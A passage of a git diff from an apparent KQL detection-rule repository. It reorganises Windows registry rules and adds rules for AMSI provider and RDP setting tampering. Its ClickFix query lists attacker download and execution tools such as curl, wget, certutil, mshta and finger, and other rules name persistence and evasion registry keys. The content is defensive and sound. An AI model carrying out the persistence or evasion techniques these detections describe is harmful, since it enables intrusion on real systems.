b/KQL/rules/windows/registry/registry_set/potential_autologger_sessions_tampering.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql rename to KQL/rules/windows/registry/registry_set/potential_autologger_sessions_tampering.kql diff --git a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql b/KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql similarity index 59% rename from KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql rename to KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql index 1f7552b1..6c856384 100644 --- a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql +++ b/KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql @@ -12,4 +12,4 @@ // - Legitimate applications using RunMRU with HTTP links DeviceRegistryEvents -| where (RegistryValueData contains "http://" or RegistryValueData contains "https://") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*" and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript")) \ No newline at end of file +| where (RegistryValueData contains "http://" or RegistryValueData contains "https://") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*" and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identification" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "finger" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql b/KQL/rules/windows/registry/registry_set/potential_cobaltstrike_service_installations_registry.kql similarity index 100% rename from KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql rename to KQL/rules/windows/registry/registry_set/potential_cobaltstrike_service_installations_registry.kql diff --git a/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql b/KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql similarity index 66% rename from KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql rename to KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql index 0c6a79b8..6f67d5b6 100644 --- a/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql +++ b/KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql @@ -9,4 +9,4 @@ // - Maybe some system utilities in rare cases use linking keys for backward compatibility DeviceRegistryEvents -| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*" and RegistryKey contains "\\TreatAs")) and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe")) \ No newline at end of file +| where (RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*" and RegistryKey contains "\\TreatAs") and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql b/KQL/rules/windows/registry/registry_set/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql similarity index 100% rename from KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql rename to KQL/rules/windows/registry/registry_set/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql diff --git a/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_eventlog_file_location_tampering.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql rename to KQL/rules/windows/registry/registry_set/potential_eventlog_file_location_tampering.kql diff --git a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_pendingfilerenameoperations_tampering.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql rename to KQL/rules/windows/registry/registry_set/potential_pendingfilerenameoperations_tampering.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_using_debugpath.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_using_debugpath.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_app_paths_default_property.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_app_paths_default_property.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_appcompat_registerapprestart_layer.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_appcompat_registerapprestart_layer.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_autodialdll.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_autodialdll.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_autodialdll.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_chm_helper_dll.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_chm_helper_dll.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_custom_protocol_handler.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_custom_protocol_handler.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_dllpathoverride.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_dllpathoverride.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_event_viewer_events_asp.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_event_viewer_events_asp.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_excel_add_in_registry.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_excel_add_in_registry.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_globalflags.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_globalflags.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql similarity index 86% rename from KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql index 4c95740d..8f2365a3 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql +++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql @@ -9,4 +9,4 @@ // - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate DeviceRegistryEvents -| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript" \ No newline at end of file +| where RegistryKey contains "UserInitMprLogonScript" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_lsa_extensions.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_lsa_extensions.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mpnotify.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_mpnotify.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_mpnotify.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mycomputer_registry_keys.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_mycomputer_registry_keys.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_netsh_helper_dll_registry.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_netsh_helper_dll_registry.kql diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql new file mode 100644 index 00000000..5a6f60be --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql @@ -0,0 +1,14 @@ +// Title: Potential Persistence Via New AMSI Providers - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections. +// Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content. +// This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate security products adding their own AMSI providers. Filter these according to your environment. + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*") and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe")) and RegistryKey contains "\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe")) and RegistryKey contains "\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Avira\\Endpoint Protection SDK\\endpointprotection.exe" and RegistryKey contains "\\{00000001-3DCC-4B48-A82E-E2071FE58E05}")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_home_page.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_home_page.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_today_page.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_today_page.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_scrobj_dll_com_hijacking.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_scrobj_dll_com_hijacking.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_in_uncommon_location.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_in_uncommon_location.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_modification.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_typedpaths.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_typedpaths.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_typedpaths.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_visual_studio_tools_for_office.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_visual_studio_tools_for_office.kql diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_powershell_execution_policy_tampering.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql rename to KQL/rules/windows/registry/registry_set/potential_powershell_execution_policy_tampering.kql diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql b/KQL/rules/windows/registry/registry_set/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql rename to KQL/rules/windows/registry/registry_set/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql diff --git a/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_psfactorybuffer_com_hijacking.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql rename to KQL/rules/windows/registry/registry_set/potential_psfactorybuffer_com_hijacking.kql diff --git a/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql b/KQL/rules/windows/registry/registry_set/potential_ransomware_activity_using_legalnotice_message.kql similarity index 100% rename from KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql rename to KQL/rules/windows/registry/registry_set/potential_ransomware_activity_using_legalnotice_message.kql diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql rename to KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_windows_telemetry.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql rename to KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_windows_telemetry.kql diff --git a/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_sentinelone_shell_context_menu_scan_command_tampering.kql similarity index 100% rename from KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql rename to KQL/rules/windows/registry/registry_set/potential_sentinelone_shell_context_menu_scan_command_tampering.kql diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql b/KQL/rules/windows/registry/registry_set/potential_signing_bypass_via_windows_developer_features_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql rename to KQL/rules/windows/registry/registry_set/potential_signing_bypass_via_windows_developer_features_registry.kql diff --git a/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql b/KQL/rules/windows/registry/registry_set/potential_werfault_reflectdebugger_registry_value_abuse.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql rename to KQL/rules/windows/registry/registry_set/potential_werfault_reflectdebugger_registry_value_abuse.kql diff --git a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql rename to KQL/rules/windows/registry/registry_set/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_desktop_background_change_via_registry.kql similarity index 100% rename from KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql rename to KQL/rules/windows/registry/registry_set/potentially_suspicious_desktop_background_change_via_registry.kql diff --git a/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_odbc_driver_registered.kql similarity index 100% rename from KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql rename to KQL/rules/windows/registry/registry_set/potentially_suspicious_odbc_driver_registered.kql diff --git a/KQL/rules/Execution/powershell_as_a_service_in_registry.kql b/KQL/rules/windows/registry/registry_set/powershell_as_a_service_in_registry.kql similarity index 100% rename from KQL/rules/Execution/powershell_as_a_service_in_registry.kql rename to KQL/rules/windows/registry/registry_set/powershell_as_a_service_in_registry.kql diff --git a/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql b/KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql similarity index 91% rename from KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql rename to KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql index 950e05a4..ff2eeb02 100644 --- a/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql +++ b/KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql @@ -4,7 +4,7 @@ // Level: high // Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging // MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.001 +// Tags: attack.defense-evasion, attack.t1564.001, attack.t1112, attack.persistence DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\PowerShell*" or RegistryKey endswith "\\Microsoft\\PowerShellCore*") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts") \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql b/KQL/rules/windows/registry/registry_set/powershell_script_execution_policy_enabled.kql similarity index 100% rename from KQL/rules/Execution/powershell_script_execution_policy_enabled.kql rename to KQL/rules/windows/registry/registry_set/powershell_script_execution_policy_enabled.kql diff --git a/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql b/KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql similarity index 84% rename from KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql rename to KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql index 16790602..5bc3bd52 100644 --- a/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql +++ b/KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql @@ -10,4 +10,4 @@ // - Programs that use the same Registry Key DeviceRegistryEvents -| where ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\EulaAccepted" \ No newline at end of file +| where RegistryKey endswith "\\EulaAccepted" \ No newline at end of file diff --git a/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql b/KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql similarity index 54% rename from KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql rename to KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql index b69bf4bd..d0b04e6a 100644 --- a/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql +++ b/KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql @@ -9,4 +9,4 @@ // - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment DeviceRegistryEvents -| where ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\SDelete" or RegistryKey contains "\\Sysinternals") and RegistryKey endswith "\\EulaAccepted" \ No newline at end of file +| where (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\SDelete" or RegistryKey contains "\\Sysinternals") and RegistryKey endswith "\\EulaAccepted" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql b/KQL/rules/windows/registry/registry_set/python_function_execution_security_warning_disabled_in_excel_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql rename to KQL/rules/windows/registry/registry_set/python_function_execution_security_warning_disabled_in_excel_registry.kql diff --git a/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql new file mode 100644 index 00000000..13ad8c41 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql @@ -0,0 +1,22 @@ +// Title: RDP Sensitive Settings Changed +// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali +// Date: 2022-08-06 +// Level: high +// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. +// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. +// Below is a list of registry keys/values that are monitored by this rule: +// - Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session. +// - DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions. +// - DisableSecuritySettings: Disables certain security settings for Remote Desktop connections. +// - fAllowUnsolicited: Allows unsolicited remote assistance offers. +// - fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control. +// - InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer. +// - ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service. +// - SecurityLayer: Specifies the security layer used for RDP connections. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112 +// False Positives: +// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) + +DeviceRegistryEvents +| where (((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\SecurityLayer" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")) and (not((RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SecurityLayer"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed_to_zero.kql similarity index 100% rename from KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql rename to KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed_to_zero.kql diff --git a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql b/KQL/rules/windows/registry/registry_set/register_new_ifiltre_for_persistence.kql similarity index 100% rename from KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql rename to KQL/rules/windows/registry/registry_set/register_new_ifiltre_for_persistence.kql diff --git a/KQL/rules/Impact/registry_disable_system_restore.kql b/KQL/rules/windows/registry/registry_set/registry_disable_system_restore.kql similarity index 100% rename from KQL/rules/Impact/registry_disable_system_restore.kql rename to KQL/rules/windows/registry/registry_set/registry_disable_system_restore.kql diff --git a/KQL/rules/Persistence/registry_explorer_policy_modification.kql b/KQL/rules/windows/registry/registry_set/registry_explorer_policy_modification.kql similarity index 100% rename from KQL/rules/Persistence/registry_explorer_policy_modification.kql rename to KQL/rules/windows/registry/registry_set/registry_explorer_policy_modification.kql diff --git a/KQL/rules/Persistence/registry_hide_function_from_user.kql b/KQL/rules/windows/registry/registry_set/registry_hide_function_from_user.kql similarity index 100% rename from KQL/rules/Persistence/registry_hide_function_from_user.kql rename to KQL/rules/windows/registry/registry_set/registry_hide_function_from_user.kql diff --git a/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql b/KQL/rules/windows/registry/registry_set/registry_modification_to_hidden_file_extension.kql similarity index 100% rename from KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql rename to KQL/rules/windows/registry/registry_set/registry_modification_to_hidden_file_extension.kql diff --git a/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql b/KQL/rules/windows/registry/registry_set/registry_persistence_via_explorer_run_key.kql similarity index 100% rename from KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql rename to KQL/rules/windows/registry/registry_set/registry_persistence_via_explorer_run_key.kql diff --git a/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql b/KQL/rules/windows/registry/registry_set/registry_persistence_via_service_in_safe_mode.kql similarity index 